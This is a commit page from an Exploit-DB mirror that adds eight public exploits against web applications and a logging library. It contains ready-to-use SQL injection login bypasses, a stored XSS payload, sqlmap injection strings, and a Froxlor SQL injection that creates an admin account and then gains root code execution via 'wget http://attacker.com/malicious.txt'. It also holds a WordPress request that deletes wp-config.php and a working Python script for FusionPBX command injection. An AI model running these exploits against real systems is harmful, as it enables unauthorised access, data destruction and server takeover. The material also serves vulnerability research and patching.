bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-11-09

Browse source 
8 changes to exploits/shellcodes

zlog 1.2.15 - Buffer Overflow
Simple Client Management System 1.0 - SQLi (Authentication Bypass)
Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
Money Transfer Management System 1.0 - Authentication Bypass
Froxlor 0.10.29.1 - SQL Injection (Authenticated)
WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
This commit is contained in:
Offensive Security 2021-11-09 05:02:09 +00:00
parent 3e60115da8
commit d8eefee2c7
9 changed files with 536 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

48
exploits/multiple/local/50504.c Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: zlog 1.2.15 - Buffer Overflow
# Date: 10/23/2021
# Exploit Author: LIWEI
# Vendor Homepage: https://github.com/HardySimpson/zlog
# Software Link: https://github.com/HardySimpson/zlog
# Version: v1.2.15
# Tested on: ubuntu 18.04.2
# 1.- compile the zlogv1.2.15 code to a library.
# 2.- Use the "zlog_init" API to parse a file. You can do it as my testcase below.
# 3.- crash. because it made a stack-buffer-overflow READ.
# 4. -Also, you can get a stack-buffer-overflow WRITE when the pointer's address which overflow read is end with "0x20".
# 5.- Here are the crash backtrace.
#0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15
#1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7
#2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18
#3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6
#4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18
And also my testcase:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include "zlog.h"
int
LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
char filename[256];
sprintf(filename, "/tmp/libfuzzer.%d", getpid());
FILE *fp = fopen(filename, "wb");
if (!fp)
return 0;
fwrite(data, size, 1, fp);
fclose(fp);
int rc = zlog_init(filename);
if (rc == 0)
{
zlog_fini();
}
unlink(filename);
remove(filename);
return 0;
}
Put my testcase in his project and change the compile line with CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++"
Use ./configure under his project as shown in his README.txt. you will get a binary as testcase's name. run and you will reproduce it.

48
exploits/php/webapps/50497.txt Normal file
View file

@ -0,0 +1,48 @@
# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass)
# Exploit Author: Sentinal920
# Date: 5-11-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: Login
# Vulnerable Parameter: "password"
Technical description:
An SQL Injection vulnerability exists in the Simple Client Management
System. An attacker can leverage the vulnerable "password" parameter
in the "Login.php" web page to authenticate as an admin user.
Steps to exploit:
1) Navigate to http://localhost/cms/admin/login.php
2) Set username as admin and insert your payload in the password parameter
Proof of concept (Poc):
The following payload inside password will allow you to login into the
web server as admin
admin'or'1'%3D'1
---
POST /cms/classes/Login.php?f=login HTTP/1.1
Host: localhost
Content-Length: 51
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close
username=admin'or'1'%3D'1&password=admin'or'1'%3D'1
---

163
exploits/php/webapps/50498.txt Normal file
View file

@ -0,0 +1,163 @@
# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: Sentinal920
# Date: 5-11-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip
# Version: 1.0
# Tested on: Kali Linux
# Vulnerable page: client,invoice
# Vulnerable Parameters: "lastname", "remarks"
Technical description:
A stored XSS vulnerability exists in the Simple Client Management
System. An attacker can leverage this vulnerability in order to run
javascript on the web server surfers behalf, which can lead to cookie
stealing, defacement and more.
Steps to exploit:
1) Navigate to http://localhost/cms/admin/?page=client
2) Click on add new client
3) Insert your payload in the "lastname" parameter or the "description" parameter
4) Click save
Proof of concept (Poc):
The following payload will allow you to run the javascript -
<script>alert(1)</script>
1) XSS POC in Add New Client
-----------------------------
POST /cms/classes/Master.php?f=save_client HTTP/1.1
Host: localhost
Content-Length: 1026
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82
Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=client/manage_client
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="lastname"
<script>alert(1)</script>
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="firstname"
anything
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="middlename"
anything
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="gender"
Male
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="dob"
2021-11-03
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="contact"
xxxxxxxxxx
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="address"
xxxxxx
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="email"
xxxx@xxx.com
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
Content-Disposition: form-data; name="avatar"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryIBW1SfSFiXMKK7Nt--
2) XSS POC in Add New Invoice
-----------------------------
POST /cms/classes/Master.php?f=save_invoice HTTP/1.1
Host: localhost
Content-Length: 1032
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82
Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=invoice/manage_invoice
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
Connection: close
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="client_id"
1
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="service_id[]"
1
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="price[]"
250
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="discount_perc"
0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="discount"
0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="tax_perc"
0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="tax"
0
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="total_amount"
250
------WebKitFormBoundaryEk0iOWhhoA0lApXo
Content-Disposition: form-data; name="remarks"
<script>alert(1)</script>
------WebKitFormBoundaryEk0iOWhhoA0lApXo--

37
exploits/php/webapps/50499.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)
# Google Dork: intitle: "Inicio de Sesión - Kmaleon"
# Date: 2021-11-05
# Exploit Author: Amel BOUZIANE-LEBLOND
# Vendor Homepage: https://www.levelprograms.com
# Software Link: https://www.levelprograms.com/kmaleon-abogados/
# Version: v1.1.0.205
# Tested on: Linux
# Description:
# The Kmaleon application from levelprogram is vulnerable to
# SQL injection via the 'tipocomb' parameter on the kmaleonW.php
==================== 1. SQLi ====================
http://127.0.0.1/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=[SQLI]&isgroup=true
The 'tipocomb' parameter is vulnerable to SQL injection.
GET parameter 'tipocomb' is vulnerable.
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb=-9144 OR 6836=6836&isgroup=true
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 8426 FROM(SELECT COUNT(*),CONCAT(0x7176716b71,(SELECT (ELT(8426=8426,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&isgroup=true
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: http://localhost/kmaleonW.php?c=age&a=doc&usuario=1&fechain=2021-11-05&fechafin=2021-11-05&tipocomb= OR (SELECT 2738 FROM (SELECT(SLEEP(5)))EYSv)&isgroup=true
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0

28
exploits/php/webapps/50501.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Money Transfer Management System 1.0 - Authentication Bypass
# Date: 2021-11-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html
# Version: 1.0
# Tested on: Windows 10
# Admin panel authentication bypass
Admin panel authentication can be bypassed due to a SQL injection in the login form:
Request:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/mtms/admin/login.php
Content-Length: 37
Cookie: PHPSESSID=8jff4m81f5j0ej125k1j9rdrc3
Connection: keep-alive
username='=''or'&password='=''or'
PoC:
curl -d "username='=''or'&password='=''or'" -X POST http://localhost/mtms/admin/login.php

91
exploits/php/webapps/50502.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated)
# Exploit Author: Martin Cernac
# Date: 2021-11-05
# Vendor: Froxlor (https://froxlor.org/)
# Software Link: https://froxlor.org/download.php
# Affected Version: 0.10.28, 0.10.29, 0.10.29.1
# Patched Version: 0.10.30
# Category: Web Application
# Tested on: Ubuntu
# CVE: 2021-42325
# 1. Technical Description:
#
# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL Injection from the authenticated customer panel. This allows an attacker to escalate privilege by creating a Froxlor administrator account and use it to get Remote Code Execution as root on the target machine.
#
# 1.1 Pre-requisites
# - Access to a customer account
# - Ability to specify database name when creating a database
# - Feature only availible from 0.10.28 onward and must be manually enabled
# 2. Proof Of Concept (PoC):
#
# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root
#
# 2.1 Privilege Escalation
#
# - Sign into Froxlor as a customer
# - View your databases
# - Create a database
# - Put your payload into the "User/Database name" field (if enabled)
# - Application will error out however your SQL query will be executed
#
# The following is a POST request example of running the payload provided, resulting in an administrator account being created
---
POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 448
s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0
---
#
# 2.2 Remote Code Execution
#
# To achieve RCE as root:
#
# - Sign into Froxlor as the newly created admin account (payload example creds are x:a)
# - Go to System Settings
# - Go to Webserver settings
# - Adjust "Webserver reload command" field to a custom command
# - The command must not contain any of the following special characters: ;|&><`$~?
# - For details, see "safe_exec" function in lib/Froxlor/FileDir.php
# - For example commands see Payloads 4.2 section
# - Trigger configuration file rebuild
# - Use menu item "Rebuild config files"
# - Await a root cron job to execute your command
# 3. Vulnerable resources and parameters
# /customer_mysql.php (POST field: custom_suffix)
# 4. Payloads
#
# 4.1 SQL Injection payload
# The following payload creates a new Froxlor admin with full access to all customers and the server configuration
# The credentials are:
# - username: x
# - password: a
#
# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);--
#
#
# 4.2 Remote Code Execution payload
# Two part payload:
# - wget http://attacker.com/malicious.txt -O /runme.php
# - php /runme.php
# 5. Timeline
# 2021-10-11 Discovery
# 2021-10-11 Contact with developer
# 2021-10-11 Patch issued but no release rolled out
# 2021-10-12 Reserved CVE-2021-42325
# 2021-11-05 Fix release rolled out
# 2021-11-07 Public disclosure
# 6. References:
# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30

57
exploits/php/webapps/50503.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
# Date: 11/07/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/
# Version: 1.0.3
# Tested on : Windows 10
#Poc:
----------------------------------REQUEST---------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce
----------------------------------------------------------------------------------
-------------------------------RESPONSE-------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2021 13:19:38 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Access-Control-Allow-Origin: http://localhost
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 9
Connection: close
Content-Type: application/json; charset=UTF-8
"success"
----------------------------------------------------------------------------------

56
exploits/php/webapps/50505.py Executable file
View file

@ -0,0 +1,56 @@
# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/08/2021
# Exploit Author: Luska
# Vendor Homepage: https://www.fusionpbx.com/
# Software Link: https://github.com/fusionpbx/fusionpbx
# Version: < 4.5.30
# Tested on: Debian
# CVE : CVE-2021-43405
#!/usr/bin/python3
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import argparse
cookies = {'PHPSESSID': '31337'}
proxy = {'http': 'http://127.0.0.1:8080'}
def login(url, username, password):
data = {
'username': username,
'password': password
}
r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies)
return r.status_code
def exploit_request(url, cmd):
print('[+] Sending Exploit Request')
mp_encoder = MultipartEncoder(fields={ 'fax_subject': '1337', 'fax_extension': f';{cmd} #', 'action': 'send', 'submit': 'send' })
r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies, headers={'Content-Type': mp_encoder.content_type}, data=mp_encoder, proxies=proxy)
return r.status_code
def exploit(url, username, password, cmd):
if login(url,username,password) == 200:
print('[+] Login Successful')
exploit_request(url, cmd)
print('[+] Exploit Sucessful')
else:
print('[-] Login Failed')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405')
parser.add_argument('-t', metavar='<target/host URL>', help='Target/host URL, example: http://127.0.0.1', required=True)
parser.add_argument('-u', metavar='<user>', help='User to login', required=True)
parser.add_argument('-p', metavar='<password>', help='User\'s password', required=True)
parser.add_argument('-c', metavar='<cmd>', help='Command to be executed', required=True)
args = parser.parse_args()
target = args.t
user = args.u
password = args.p
cmd = args.c
exploit(target, user, password, cmd)

8
files_exploits.csv
View file

@ -11412,6 +11412,7 @@ id,file,description,date,author,type,platform,port
50472,exploits/windows/local/50472.py,"10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)",1970-01-01,ro0k,local,windows,
50484,exploits/windows/local/50484.txt,"RDP Manager 4.9.9.3 - Denial-of-Service (PoC)",1970-01-01,Vulnerability-Lab,local,windows,
50494,exploits/windows/local/50494.txt,"10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path",1970-01-01,"Brian Rodriguez",local,windows,
50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",1970-01-01,LIWEI,local,multiple,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -44596,3 +44597,10 @@ id,file,description,date,author,type,platform,port
50493,exploits/php/webapps/50493.py,"Opencart 3 Extension TMD Vendor System - Blind SQL Injection",1970-01-01,"Muhammad Zaki Sulistya",webapps,php,
50495,exploits/php/webapps/50495.txt,"Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
50496,exploits/multiple/webapps/50496.txt,"ImportExportTools NG 10.0.4 - HTML Injection",1970-01-01,Vulnerability-Lab,webapps,multiple,
50497,exploits/php/webapps/50497.txt,"Simple Client Management System 1.0 - SQLi (Authentication Bypass)",1970-01-01,Sentinal920,webapps,php,
50498,exploits/php/webapps/50498.txt,"Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,Sentinal920,webapps,php,
50499,exploits/php/webapps/50499.txt,"Kmaleon 1.1.0.205 - 'tipocomb' SQL Injection (Authenticated)",1970-01-01,"Amel BOUZIANE-LEBLOND",webapps,php,
50501,exploits/php/webapps/50501.txt,"Money Transfer Management System 1.0 - Authentication Bypass",1970-01-01,"Aryan Chehreghani",webapps,php,
50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",1970-01-01,"Martin Cernac",webapps,php,
50503,exploits/php/webapps/50503.txt,"WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion",1970-01-01,"Murat DEMİRCİ",webapps,php,
50505,exploits/php/webapps/50505.py,"FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Luska,webapps,php,

Can't render this file because it is too large.